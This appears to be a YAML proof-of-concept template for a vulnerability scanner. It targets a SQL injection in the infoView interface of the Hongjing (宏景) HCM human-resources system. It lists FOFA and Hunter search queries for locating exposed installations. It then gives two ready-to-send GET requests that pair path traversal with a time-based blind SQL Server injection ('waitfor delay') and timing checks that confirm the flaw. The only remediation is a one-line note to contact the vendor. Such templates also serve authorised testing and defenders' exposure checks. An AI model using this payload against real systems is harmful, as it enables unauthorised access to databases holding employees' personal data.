product: 宏景HCM管理系统
vName: 宏景HCM infoView接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 宏景HCM infoView接口SQL注入
version: ''
note: ''
search:
  FOFA: app="HJSOFT-HCM"
  Hunter: app.name="宏景 HCM"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /templates/attestation/../../general/info/view?kind=1&a0100=1';waitfor+delay+'0:0:5'+--
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: ">="
            num: 5
  - exp:
      method: get
      follow: false
      path: /templates/attestation/../../general/info/view?kind=1&a0100=1';waitfor+delay+'0:0:0'+--
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: "<="
            num: 3